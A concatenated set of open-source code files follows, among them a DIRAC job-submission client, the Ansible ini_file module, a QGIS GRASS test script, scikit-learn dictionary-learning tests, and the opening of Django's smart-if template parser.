dest='paths_with_depspath',
default=[],
action='append',
help='A path to a source file and an alternate path to '
'the file in the generated deps file (if either contains '
'a space, surround with whitespace). This flag may be '
'specified multiple times.')
return parser
def _NormalizePathSeparators(path):
"""Replaces OS-specific path separators with POSIX-style slashes.
Args:
path: str, A file path.
Returns:
str, The path with any OS-specific path separators (such as backslash on
Windows) replaced with URL-compatible forward slashes. A no-op on systems
that use POSIX paths.
"""
return path.replace(os.sep, posixpath.sep)
def _GetRelativePathToSourceDict(root, prefix=''):
"""Scans a top root directory for .js sources.
Args:
root: str, Root directory.
prefix: str, Prefix for returned paths.
Returns:
dict, A map of relative paths (with prefix, if given), to source.Source
objects.
"""
# Remember and restore the cwd when we're done. We work from the root so
# that paths are relative from the root.
start_wd = os.getcwd()
os.chdir(root)
path_to_source = {}
for path in treescan.ScanTreeForJsFiles('.'):
prefixed_path = _NormalizePathSeparators(os.path.join(prefix, path))
path_to_source[prefixed_path] = source.Source(source.GetFileContents(path))
os.chdir(start_wd)
return path_to_source
def _GetPair(s):
"""Return a string as a shell-parsed tuple. Two values expected."""
try:
# shlex uses '\' as an escape character, so they must be escaped.
s = s.replace('\\', '\\\\')
first, second = shlex.split(s)
return (first, second)
except:
raise Exception('Unable to parse input line as a pair: %s' % s)
def main():
"""CLI frontend to MakeDepsFile."""
logging.basicConfig(format=(sys.argv[0] + ': %(message)s'),
level=logging.INFO)
options, args = _GetOptionsParser().parse_args()
path_to_source = {}
# Roots without prefixes
for root in options.roots:
path_to_source.update(_GetRelativePathToSourceDict(root))
# Roots with prefixes
for root_and_prefix in options.roots_with_prefix:
root, prefix = _GetPair(root_and_prefix)
path_to_source.update(_GetRelativePathToSourceDict(root, prefix=prefix))
# Source paths
for path in args:
path_to_source[path] = source.Source(source.GetFileContents(path))
# Source paths with alternate deps paths
for path_with_depspath in options.paths_with_depspath:
srcpath, depspath = _GetPair(path_with_depspath)
path_to_source[depspath] = source.Source(source.GetFileContents(srcpath))
# Make our output pipe.
if options.output_file:
out = open(options.output_file, 'w')
else:
out = sys.stdout
out.write(('// This file was autogenerated by %s.\n' %
os.path.basename(__file__)))
out.write('// Please do not edit.\n')
out.write(MakeDepsFile(path_to_source))
if __name__ == '__main__':
main()
|
fstagni/DIRAC | refs/heads/v7r0-fixes27 | WorkloadManagementSystem/Client/WMSClient.py | 6 | """ DIRAC Workload Management System Client class encapsulates all the
methods necessary to communicate with the Workload Management System
"""
import os
import StringIO
import time
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.DISET.RPCClient import RPCClient
from DIRAC.Core.Utilities.ClassAd.ClassAdLight import ClassAd
from DIRAC.Core.Utilities import File
from DIRAC.WorkloadManagementSystem.Client.SandboxStoreClient import SandboxStoreClient
from DIRAC.WorkloadManagementSystem.Utilities.ParametricJob import getParameterVectorLength
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.Core.Utilities.DErrno import EWMSJDL, EWMSSUBM
__RCSID__ = "$Id$"
class WMSClient(object):
""" Class exposing the following jobs methods:
submit
kill
delete
reschedule
reset
"""
def __init__(self, jobManagerClient=None, sbRPCClient=None, sbTransferClient=None,
useCertificates=False, timeout=600, delegatedDN=None, delegatedGroup=None):
""" WMS Client constructor
Here we also initialize the needed clients and connections
"""
self.useCertificates = useCertificates
self.delegatedDN = delegatedDN
self.delegatedGroup = delegatedGroup
self.timeout = timeout
self._jobManager = jobManagerClient
self.operationsHelper = Operations()
self.sandboxClient = None
if sbRPCClient and sbTransferClient:
self.sandboxClient = SandboxStoreClient(rpcClient=sbRPCClient,
transferClient=sbTransferClient,
useCertificates=useCertificates)
@property
def jobManager(self):
if not self._jobManager:
self._jobManager = RPCClient('WorkloadManagement/JobManager',
useCertificates=self.useCertificates,
delegatedDN=self.delegatedDN,
delegatedGroup=self.delegatedGroup,
timeout=self.timeout)
return self._jobManager
###############################################################################
def __getInputSandboxEntries(self, classAdJob):
if classAdJob.lookupAttribute("InputSandbox"):
inputSandbox = classAdJob.get_expression("InputSandbox")
inputSandbox = inputSandbox.replace('","', "\n")
inputSandbox = inputSandbox.replace('{', "")
inputSandbox = inputSandbox.replace('}', "")
inputSandbox = inputSandbox.replace('"', "")
inputSandbox = inputSandbox.replace(',', "")
inputSandbox = inputSandbox.split()
else:
inputSandbox = []
return inputSandbox
def __uploadInputSandbox(self, classAdJob, jobDescriptionObject=None):
"""Checks the validity of the job Input Sandbox.
The function returns the list of Input Sandbox files.
The total volume of the input sandbox is evaluated
"""
inputSandbox = self.__getInputSandboxEntries(classAdJob)
realFiles = []
badFiles = []
diskFiles = []
for isFile in inputSandbox:
if not isFile.startswith(('lfn:', 'LFN:', 'SB:', '%s', '%(')):
realFiles.append(isFile)
stringIOFiles = []
stringIOFilesSize = 0
if jobDescriptionObject is not None:
if isinstance(jobDescriptionObject, StringIO.StringIO):
stringIOFiles = [jobDescriptionObject]
stringIOFilesSize = len(jobDescriptionObject.buf)
gLogger.debug("Size of the stringIOFiles: " + str(stringIOFilesSize))
else:
return S_ERROR(EWMSJDL, "jobDescriptionObject is not a StringIO object")
# Check real files
for isFile in realFiles:
if not os.path.exists(isFile): # we are passing in real files, we expect them to be on disk
badFiles.append(isFile)
gLogger.warn("inputSandbox file/directory " + isFile + " not found. Keep looking for the others")
continue
diskFiles.append(isFile)
diskFilesSize = File.getGlobbedTotalSize(diskFiles)
gLogger.debug("Size of the diskFiles: " + str(diskFilesSize))
totalSize = diskFilesSize + stringIOFilesSize
gLogger.verbose("Total size of the inputSandbox: " + str(totalSize))
okFiles = stringIOFiles + diskFiles
if badFiles:
result = S_ERROR(EWMSJDL, 'Input Sandbox is not valid')
result['BadFile'] = badFiles
result['TotalSize'] = totalSize
return result
if okFiles:
if not self.sandboxClient:
self.sandboxClient = SandboxStoreClient(useCertificates=self.useCertificates,
delegatedDN=self.delegatedDN,
delegatedGroup=self.delegatedGroup)
result = self.sandboxClient.uploadFilesAsSandbox(okFiles)
if not result['OK']:
return result
inputSandbox.append(result['Value'])
classAdJob.insertAttributeVectorString("InputSandbox", inputSandbox)
return S_OK()
def submitJob(self, jdl, jobDescriptionObject=None):
""" Submit one job specified by its JDL to WMS.
The JDL may actually be the desciption of a parametric job,
resulting in multiple DIRAC jobs submitted to the DIRAC WMS
"""
if os.path.exists(jdl):
with open(jdl, "r") as fic:
jdlString = fic.read()
else:
# If file JDL does not exist, assume that the JDL is passed as a string
jdlString = jdl
jdlString = jdlString.strip()
# Strip of comments in the jdl string
newJdlList = []
for line in jdlString.split('\n'):
if not line.strip().startswith('#'):
newJdlList.append(line)
jdlString = '\n'.join(newJdlList)
# Check the validity of the input JDL
if jdlString.find("[") != 0:
jdlString = "[%s]" % jdlString
classAdJob = ClassAd(jdlString)
if not classAdJob.isOK():
return S_ERROR(EWMSJDL, 'Invalid job JDL')
# Check the size and the contents of the input sandbox
result = self.__uploadInputSandbox(classAdJob, jobDescriptionObject)
if not result['OK']:
return result
# Submit the job now and get the new job ID
result = getParameterVectorLength(classAdJob)
if not result['OK']:
return result
nJobs = result['Value']
parametricJob = nJobs > 0
result = self.jobManager.submitJob(classAdJob.asJDL())
if parametricJob:
gLogger.debug('Applying transactional job submission')
# The server applies transactional bulk submission, we should confirm the jobs
if result['OK']:
jobIDList = result['Value']
if len(jobIDList) == nJobs:
# Confirm the submitted jobs
confirmed = False
for _attempt in xrange(3):
result = self.jobManager.confirmBulkSubmission(jobIDList)
if result['OK']:
confirmed = True
break
time.sleep(1)
if not confirmed:
# The bulk submission failed, try to delete the created jobs
resultDelete = self.jobManager.deleteJob(jobIDList)
error = "Job submission failed to confirm bulk transaction"
if not resultDelete['OK']:
error += "; removal of created jobs failed"
return S_ERROR(EWMSSUBM, error)
else:
return S_ERROR(EWMSSUBM, "The number of submitted jobs does not match job description")
if result.get('requireProxyUpload'):
gLogger.warn("Need to upload the proxy")
return result
def killJob(self, jobID):
""" Kill running job.
jobID can be an integer representing a single DIRAC job ID or a list of IDs
"""
return self.jobManager.killJob(jobID)
def deleteJob(self, jobID):
""" Delete job(s) from the WMS Job database.
jobID can be an integer representing a single DIRAC job ID or a list of IDs
"""
return self.jobManager.deleteJob(jobID)
def rescheduleJob(self, jobID):
""" Reschedule job(s) in WMS Job database.
jobID can be an integer representing a single DIRAC job ID or a list of IDs
"""
return self.jobManager.rescheduleJob(jobID)
def resetJob(self, jobID):
""" Reset job(s) in WMS Job database.
jobID can be an integer representing a single DIRAC job ID or a list of IDs
"""
return self.jobManager.resetJob(jobID)
|
aasensio/pyiacsun | refs/heads/master | pyiacsun/sparse/proxes_rank1/prox_rank1_l1.py | 2 | __all__ = ["prox_rank1_l1"]
from .prox_rank1_generic import prox_rank1_generic
import numpy as np
def prox_rank1_l1(*args, **kwargs):
"""
PROX_RANK1_L1 returns the scaled proximity operator for the l1 norm
x = prox_rank1_l1( x0, D, u )
where
x = argmin_{x} h(x) + 1/2||x-x0||^2_{V}
and
V^{-1} = D + u*u' (or diag(D) + u*u' if D is a vector)
"D" must be diagonal and positive. "u" can be any vector.
Here, h(x) = ||x||_1 (the "l-1" norm)
There are also variants:
x = prox_rank1_l1( x0, D, u, lambda, linTerm, sigma, inverse)
returns
x = argmin_{x} h(lambda.*x) + 1/2||x-x0||^2_{V} + linTerm'*x
and
either V^{-1} = D + sigma*u*u' if "inverse" is true (default)
or V = D + sigma*u*u' if "inverse" is false
and in both cases, "sigma" is either +1 (default) or -1.
"lambda" should be non-zero
Stephen Becker, Feb 26 2014, stephen.beckr@gmail.com
Reference: "A quasi-Newton proximal splitting method" by S. Becker and J. Fadili
NIPS 2012, http://arxiv.org/abs/1206.1156
Python version: A. Asensio Ramos (March 12, 2015)
"""
prox = lambda x, t : np.sign(x) * (np.abs(x)-t).clip(0)
prox_brk_pts = lambda s : np.hstack((-s,s))
return prox_rank1_generic(prox, prox_brk_pts, *args, **kwargs) |
feinheit/zipfelchappe | refs/heads/master | tests/cod/__init__.py | 4 | # coding: utf-8
from __future__ import absolute_import, unicode_literals |
ashemedai/ansible | refs/heads/devel | lib/ansible/modules/files/ini_file.py | 54 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# (c) 2015, Ales Nosek <anosek.nosek () gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ini_file
short_description: Tweak settings in INI files
extends_documentation_fragment: files
description:
- Manage (add, remove, change) individual settings in an INI-style file without having
to manage the file as a whole with, say, M(template) or M(assemble). Adds missing
sections if they don't exist.
- Before version 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.
- Since version 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when
no other modifications need to be applied.
version_added: "0.9"
options:
path:
description:
- Path to the INI-style file; this file is created if required.
- Before 2.3 this option was only usable as I(dest).
required: true
default: null
aliases: ['dest']
section:
description:
- Section name in INI file. This is added if C(state=present) automatically when
a single value is being set.
- If left empty or set to `null`, the I(option) will be placed before the first I(section).
Using `null` is also required if the config format does not support sections.
required: true
default: null
option:
description:
- If set (required for changing a I(value)), this is the name of the option.
- May be omitted if adding/removing a whole I(section).
required: false
default: null
value:
description:
- The string value to be associated with an I(option). May be omitted when removing an I(option).
required: false
default: null
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
required: false
default: "no"
choices: [ "yes", "no" ]
others:
description:
- All arguments accepted by the M(file) module also work here
required: false
state:
description:
- If set to C(absent) the option or section will be removed if present instead of created.
required: false
default: "present"
choices: [ "present", "absent" ]
no_extra_spaces:
description:
- Do not insert spaces before and after '=' symbol
required: false
default: false
version_added: "2.1"
create:
required: false
choices: [ "yes", "no" ]
default: "yes"
description:
- If set to 'no', the module will fail if the file does not already exist.
By default it will create the file if it is missing.
version_added: "2.2"
notes:
- While it is possible to add an I(option) without specifying a I(value), this makes
no sense.
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but
I(dest) still works as well.
author:
- "Jan-Piet Mens (@jpmens)"
- "Ales Nosek (@noseka1)"
'''
EXAMPLES = '''
# Before 2.3, option 'dest' was used instead of 'path'
- name: Ensure "fav=lemonade is in section "[drinks]" in specified file
ini_file:
path: /etc/conf
section: drinks
option: fav
value: lemonade
mode: 0600
backup: yes
- ini_file:
path: /etc/anotherconf
section: drinks
option: temperature
value: cold
backup: yes
'''
import os
import re
# import module snippets
from ansible.module_utils.basic import AnsibleModule
# ==============================================================
# match_opt
def match_opt(option, line):
option = re.escape(option)
return re.match(' *%s( |\t)*=' % option, line) \
or re.match('# *%s( |\t)*=' % option, line) \
or re.match('; *%s( |\t)*=' % option, line)
# ==============================================================
# match_active_opt
def match_active_opt(option, line):
option = re.escape(option)
return re.match(' *%s( |\t)*=' % option, line)
# ==============================================================
# do_ini
def do_ini(module, filename, section=None, option=None, value=None,
state='present', backup=False, no_extra_spaces=False, create=True):
diff = {'before': '',
'after': '',
'before_header': '%s (content)' % filename,
'after_header': '%s (content)' % filename}
if not os.path.exists(filename):
if not create:
module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)
destpath = os.path.dirname(filename)
if not os.path.exists(destpath) and not module.check_mode:
os.makedirs(destpath)
ini_lines = []
else:
ini_file = open(filename, 'r')
try:
ini_lines = ini_file.readlines()
finally:
ini_file.close()
if module._diff:
diff['before'] = ''.join(ini_lines)
changed = False
# ini file could be empty
if not ini_lines:
ini_lines.append('\n')
# last line of file may not contain a trailing newline
if ini_lines[-1] == "" or ini_lines[-1][-1] != '\n':
ini_lines[-1] += '\n'
changed = True
# append a fake section line to simplify the logic
ini_lines.append('[')
within_section = not section
section_start = 0
msg = 'OK'
if no_extra_spaces:
assignment_format = '%s=%s\n'
else:
assignment_format = '%s = %s\n'
for index, line in enumerate(ini_lines):
if line.startswith('[%s]' % section):
within_section = True
section_start = index
elif line.startswith('['):
if within_section:
if state == 'present':
# insert missing option line at the end of the section
for i in range(index, 0, -1):
# search backwards for previous non-blank or non-comment line
if not re.match(r'^[ \t]*([#;].*)?$', ini_lines[i - 1]):
ini_lines.insert(i, assignment_format % (option, value))
msg = 'option added'
changed = True
break
elif state == 'absent' and not option:
# remove the entire section
del ini_lines[section_start:index]
msg = 'section removed'
changed = True
break
else:
if within_section and option:
if state == 'present':
# change the existing option line
if match_opt(option, line):
newline = assignment_format % (option, value)
option_changed = ini_lines[index] != newline
changed = changed or option_changed
if option_changed:
msg = 'option changed'
ini_lines[index] = newline
if option_changed:
# remove all possible option occurrences from the rest of the section
index = index + 1
while index < len(ini_lines):
line = ini_lines[index]
if line.startswith('['):
break
if match_active_opt(option, line):
del ini_lines[index]
else:
index = index + 1
break
elif state == 'absent':
# delete the existing line
if match_active_opt(option, line):
del ini_lines[index]
changed = True
msg = 'option changed'
break
# remove the fake section line
del ini_lines[-1:]
if not within_section and option and state == 'present':
ini_lines.append('[%s]\n' % section)
ini_lines.append(assignment_format % (option, value))
changed = True
msg = 'section and option added'
if module._diff:
diff['after'] = ''.join(ini_lines)
backup_file = None
if changed and not module.check_mode:
if backup:
backup_file = module.backup_local(filename)
ini_file = open(filename, 'w')
try:
ini_file.writelines(ini_lines)
finally:
ini_file.close()
return (changed, backup_file, diff, msg)
# ==============================================================
# main
def main():
module = AnsibleModule(
argument_spec = dict(
path = dict(required=True, aliases=['dest'], type='path'),
section = dict(required=True),
option = dict(required=False),
value = dict(required=False),
backup = dict(default='no', type='bool'),
state = dict(default='present', choices=['present', 'absent']),
no_extra_spaces = dict(required=False, default=False, type='bool'),
create=dict(default=True, type='bool')
),
add_file_common_args = True,
supports_check_mode = True
)
path = module.params['path']
section = module.params['section']
option = module.params['option']
value = module.params['value']
state = module.params['state']
backup = module.params['backup']
no_extra_spaces = module.params['no_extra_spaces']
create = module.params['create']
(changed,backup_file,diff,msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create)
if not module.check_mode and os.path.exists(path):
file_args = module.load_file_common_arguments(module.params)
changed = module.set_fs_attributes_if_different(file_args, changed)
results = { 'changed': changed, 'msg': msg, 'path': path, 'diff': diff }
if backup_file is not None:
results['backup_file'] = backup_file
# Mission complete
module.exit_json(**results)
if __name__ == '__main__':
main()
|
gioman/QGIS | refs/heads/master | src/plugins/grass/qgis_grass_test.py | 7 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------
#
# Copyright (C) 2012 Radim Blazek
# EMAIL: radim.blazek (at) gmail.com
#
# -----------------------------------------------------------
#
# licensed under the terms of GNU GPL 2
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# ---------------------------------------------------------------------
"""
***************************************************************************
GRASS Direct test - to be run in GRASS shell
- collects list of raster layers
- exports GRASS layers on low resolution to temporary GeoTIFFs
- runs GRASS modules in standard and direct mode and compares results
- writes out report
***************************************************************************
"""
__author__ = 'Radim Blazek'
__date__ = 'December 2012'
__copyright__ = '(C) 2012, Radim Blazek'
__revision__ = '$Format:%H$'
import os
import sys
import subprocess
import time
import re
class Test:
def __init__(self):
if "GISBASE" not in os.environ or "GISRC" not in os.environ:
print("This script must be run in GRASS shell.")
sys.exit(1)
if "QGIS_PREFIX_PATH" not in os.environ:
print("QGIS_PREFIX_PATH environment variable not set.")
sys.exit(1)
self.size = 10
self.reportStr = ""
pass
# add message to HTML report
def report(self, msg):
self.reportStr += msg + "\n"
def writeReport(self):
print(self.reportStr)
def test(self):
print("GRASS Direct test")
tmp_dir = os.path.abspath("qgis-grass-test-%s" % time.strftime('%y%m%d-%H%M%S'))
tmp_dir = os.path.abspath("qgis-grass-test-debug") # debug
print("Output will be written to %s" % tmp_dir)
files_dir = "%s/tif" % tmp_dir
# os.makedirs( files_dir )
# get list of raster layers
print("Getting list of rasters ...")
rasters = self.srun(["g.mlist", "type=rast"]).splitlines()
max_rasters = 1
print("%s rasters found, using first %s" % (len(rasters), max_rasters))
rasters = rasters[0:1]
print("Exporting rasters")
for raster in rasters:
print(raster)
output = "%s/%s.tif" % (files_dir, raster)
self.srun(["g.region", "rast=%s" % raster, "cols=%s" % self.size, "rows=%s" % self.size])
self.srun(["r.out.gdal", "input=%s" % raster, "output=%s" % output])
# run modules
for module in self.modules():
for raster in rasters:
module = re.sub(" *", " ", module)
module_name = module.split(" ")[0]
# --- native ---
self.srun(["g.region", "rast=%s" % raster, "cols=%s" % self.size, "rows=%s" % self.size])
output = "qgistest1"
# clean old
self.srun(["g.remove", "-f", "rast=%s" % output])
# substitute rasters
native_args = module.replace("R1", raster).replace("RO1", output).split(" ")
(code, out, err) = self.run(native_args)
if code != 0:
self.report("Native failed: %s" % " ".join(native_args))
# export
native_output_file = "%s/%s-%s-native.tif" % (files_dir, module_name, raster)
self.srun(["r.out.gdal", "input=%s" % output, "output=%s" % native_output_file])
self.srun(["g.remove", "-f", "rast=%s" % output])
# --- direct ---
direct_input_file = "%s/%s.tif" % (files_dir, raster)
direct_output_file = "%s/%s-%s-direct.tif" % (files_dir, module_name, raster)
# substitute rasters
direct_args = module.replace("R1", direct_input_file).replace("RO1", direct_output_file).split(" ")
env = os.environ
# CRS
proj = self.srun(["g.proj", "-j"])
longlat = True if proj.find("+proj=longlat") != -1 else False
proj = proj.splitlines()
proj = " ".join(proj)
print(proj)
env['QGIS_GRASS_CRS'] = proj
# set GRASS region as environment variable
reg = self.srun(["g.region", "-g"])
reg_dict = dict(item.split("=") for item in reg.splitlines())
reg_var = {'n': 'north', 's': 'south', 'e': 'east', 'w': 'west', 'nsres': 'n-s resol', 'ewres': 'e-w resol'}
if longlat:
region = "proj:3;zone:-1" # longlat
else:
region = "proj:99;zone:-1" # other projection
for k, v in reg_dict.iteritems():
if k == 'cells':
continue
kn = k
if k in reg_var:
kn = reg_var[k]
region += ";%s:%s" % (kn, v)
print(region)
env['GRASS_REGION'] = region
# add path to fake GRASS gis library
env['LD_LIBRARY_PATH'] = "%s/lib/qgis/plugins/:%s" % (env['QGIS_PREFIX_PATH'], env['LD_LIBRARY_PATH'])
(code, out, err) = self.run(direct_args, env)
print("code = %s" % code)
if code != 0:
self.report("Direct failed: %s\n%s\n%s" % (" ".join(direct_args), out, err))
# TODO: compare native x direct output
def run(self, args, env=None, input=None, exit_on_error=False):
cmd = " ".join(args)
print(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, env=env)
com = p.communicate(input)
p.wait()
if p.returncode != 0 and exit_on_error:
msg = "Failed:\n" + str(com[0]) + "\n" + str(com[1])
raise Exception(msg)
return (p.returncode, com[0], com[1]) # return stdout
# simple run
def srun(self, args):
return self.run(args, None, None, True)[1]
def modules(self):
# R1 - input raster 1
# RO1 - output raster 1
modules = [
"r.slope.aspect elevation=R1 aspect=RO1"
]
return modules
if __name__ == '__main__':
test = Test()
test.test()
test.writeReport()
|
RachitKansal/scikit-learn | refs/heads/master | sklearn/decomposition/tests/test_dict_learning.py | 69 | import numpy as np
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import TempMemmap
from sklearn.decomposition import DictionaryLearning
from sklearn.decomposition import MiniBatchDictionaryLearning
from sklearn.decomposition import SparseCoder
from sklearn.decomposition import dict_learning_online
from sklearn.decomposition import sparse_encode
rng_global = np.random.RandomState(0)
n_samples, n_features = 10, 8
X = rng_global.randn(n_samples, n_features)
def test_dict_learning_shapes():
n_components = 5
dico = DictionaryLearning(n_components, random_state=0).fit(X)
assert_true(dico.components_.shape == (n_components, n_features))
def test_dict_learning_overcomplete():
n_components = 12
dico = DictionaryLearning(n_components, random_state=0).fit(X)
assert_true(dico.components_.shape == (n_components, n_features))
def test_dict_learning_reconstruction():
n_components = 12
dico = DictionaryLearning(n_components, transform_algorithm='omp',
transform_alpha=0.001, random_state=0)
code = dico.fit(X).transform(X)
assert_array_almost_equal(np.dot(code, dico.components_), X)
dico.set_params(transform_algorithm='lasso_lars')
code = dico.transform(X)
assert_array_almost_equal(np.dot(code, dico.components_), X, decimal=2)
# used to test lars here too, but there's no guarantee the number of
# nonzero atoms is right.
def test_dict_learning_reconstruction_parallel():
# regression test that parallel reconstruction works with n_jobs=-1
n_components = 12
dico = DictionaryLearning(n_components, transform_algorithm='omp',
transform_alpha=0.001, random_state=0, n_jobs=-1)
code = dico.fit(X).transform(X)
assert_array_almost_equal(np.dot(code, dico.components_), X)
dico.set_params(transform_algorithm='lasso_lars')
code = dico.transform(X)
assert_array_almost_equal(np.dot(code, dico.components_), X, decimal=2)
def test_dict_learning_lassocd_readonly_data():
n_components = 12
with TempMemmap(X) as X_read_only:
dico = DictionaryLearning(n_components, transform_algorithm='lasso_cd',
transform_alpha=0.001, random_state=0, n_jobs=-1)
code = dico.fit(X_read_only).transform(X_read_only)
assert_array_almost_equal(np.dot(code, dico.components_), X_read_only, decimal=2)
def test_dict_learning_nonzero_coefs():
n_components = 4
dico = DictionaryLearning(n_components, transform_algorithm='lars',
transform_n_nonzero_coefs=3, random_state=0)
code = dico.fit(X).transform(X[np.newaxis, 1])
assert_true(len(np.flatnonzero(code)) == 3)
dico.set_params(transform_algorithm='omp')
code = dico.transform(X[np.newaxis, 1])
assert_equal(len(np.flatnonzero(code)), 3)
def test_dict_learning_unknown_fit_algorithm():
n_components = 5
dico = DictionaryLearning(n_components, fit_algorithm='<unknown>')
assert_raises(ValueError, dico.fit, X)
def test_dict_learning_split():
n_components = 5
dico = DictionaryLearning(n_components, transform_algorithm='threshold',
random_state=0)
code = dico.fit(X).transform(X)
dico.split_sign = True
split_code = dico.transform(X)
assert_array_equal(split_code[:, :n_components] -
split_code[:, n_components:], code)
def test_dict_learning_online_shapes():
rng = np.random.RandomState(0)
n_components = 8
code, dictionary = dict_learning_online(X, n_components=n_components,
alpha=1, random_state=rng)
assert_equal(code.shape, (n_samples, n_components))
assert_equal(dictionary.shape, (n_components, n_features))
assert_equal(np.dot(code, dictionary).shape, X.shape)
def test_dict_learning_online_verbosity():
n_components = 5
# test verbosity
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
try:
sys.stdout = StringIO()
dico = MiniBatchDictionaryLearning(n_components, n_iter=20, verbose=1,
random_state=0)
dico.fit(X)
dico = MiniBatchDictionaryLearning(n_components, n_iter=20, verbose=2,
random_state=0)
dico.fit(X)
dict_learning_online(X, n_components=n_components, alpha=1, verbose=1,
random_state=0)
dict_learning_online(X, n_components=n_components, alpha=1, verbose=2,
random_state=0)
finally:
sys.stdout = old_stdout
assert_true(dico.components_.shape == (n_components, n_features))
def test_dict_learning_online_estimator_shapes():
n_components = 5
dico = MiniBatchDictionaryLearning(n_components, n_iter=20, random_state=0)
dico.fit(X)
assert_true(dico.components_.shape == (n_components, n_features))
def test_dict_learning_online_overcomplete():
n_components = 12
dico = MiniBatchDictionaryLearning(n_components, n_iter=20,
random_state=0).fit(X)
assert_true(dico.components_.shape == (n_components, n_features))
def test_dict_learning_online_initialization():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features)
dico = MiniBatchDictionaryLearning(n_components, n_iter=0,
dict_init=V, random_state=0).fit(X)
assert_array_equal(dico.components_, V)
def test_dict_learning_online_partial_fit():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features) # random init
V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
dict1 = MiniBatchDictionaryLearning(n_components, n_iter=10 * len(X),
batch_size=1,
alpha=1, shuffle=False, dict_init=V,
random_state=0).fit(X)
dict2 = MiniBatchDictionaryLearning(n_components, alpha=1,
n_iter=1, dict_init=V,
random_state=0)
for i in range(10):
for sample in X:
dict2.partial_fit(sample[np.newaxis, :])
assert_true(not np.all(sparse_encode(X, dict1.components_, alpha=1) ==
0))
assert_array_almost_equal(dict1.components_, dict2.components_,
decimal=2)
def test_sparse_encode_shapes():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features) # random init
V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
for algo in ('lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'):
code = sparse_encode(X, V, algorithm=algo)
assert_equal(code.shape, (n_samples, n_components))
def test_sparse_encode_error():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features) # random init
V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
code = sparse_encode(X, V, alpha=0.001)
assert_true(not np.all(code == 0))
assert_less(np.sqrt(np.sum((np.dot(code, V) - X) ** 2)), 0.1)
def test_sparse_encode_error_default_sparsity():
rng = np.random.RandomState(0)
X = rng.randn(100, 64)
D = rng.randn(2, 64)
code = ignore_warnings(sparse_encode)(X, D, algorithm='omp',
n_nonzero_coefs=None)
assert_equal(code.shape, (100, 2))
def test_unknown_method():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features) # random init
assert_raises(ValueError, sparse_encode, X, V, algorithm="<unknown>")
def test_sparse_coder_estimator():
n_components = 12
rng = np.random.RandomState(0)
V = rng.randn(n_components, n_features) # random init
V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
code = SparseCoder(dictionary=V, transform_algorithm='lasso_lars',
transform_alpha=0.001).transform(X)
assert_true(not np.all(code == 0))
assert_less(np.sqrt(np.sum((np.dot(code, V) - X) ** 2)), 0.1)
|
knowsis/django | refs/heads/nonrel-1.6 | django/template/smartif.py | 239 | """
Parser and utilities for the smart 'if' tag
"""
# Using a simple top down parser, as described here:
# http://effbot.org/zone/simple-top-down-parsing.htm.
# 'led' = left denotation
# 'nud' = null denotation
# 'bp' = binding power (left = lbp, right = rbp)
class TokenBase(object):
"""
Base class for operators and literals, mainly for debugging and for throwing
syntax errors.
"""
id = None # node/token type name
value = None # used by literals
first = second = None # used by tree nodes
def nud(self, parser):
# Null denotation - called in prefix context
raise parser.error_class(
"Not expecting '%s' in this position in if tag." % self.id
)
def led(self, left, parser):
# Left denotation - called in infix context
raise parser.error_class(
"Not expecting '%s' as infix operator in if tag." % self.id
)
def display(self):
"""
Returns what to display in error messages for this node
"""
return self.id
def __repr__(self):
out = [str(x) for x in [self.id, self.first, self.second] if x is not None]
return "(" + " ".join(out) + ")"
def infix(bp, func):
"""
Creates an infix operator, given a binding power and a function that
evaluates the node
"""
class Operator(TokenBase):
lbp = bp
def led(self, left, parser):
self.first = left
self.second = parser.expression(bp)
return self
def eval(self, context):
try:
return func(context, self.first, self.second)
except Exception:
# Templates shouldn't throw exceptions when rendering. We are
# most likely to get exceptions for things like {% if foo in bar
# %} where 'bar' does not support 'in', so default to False
return False
return Operator
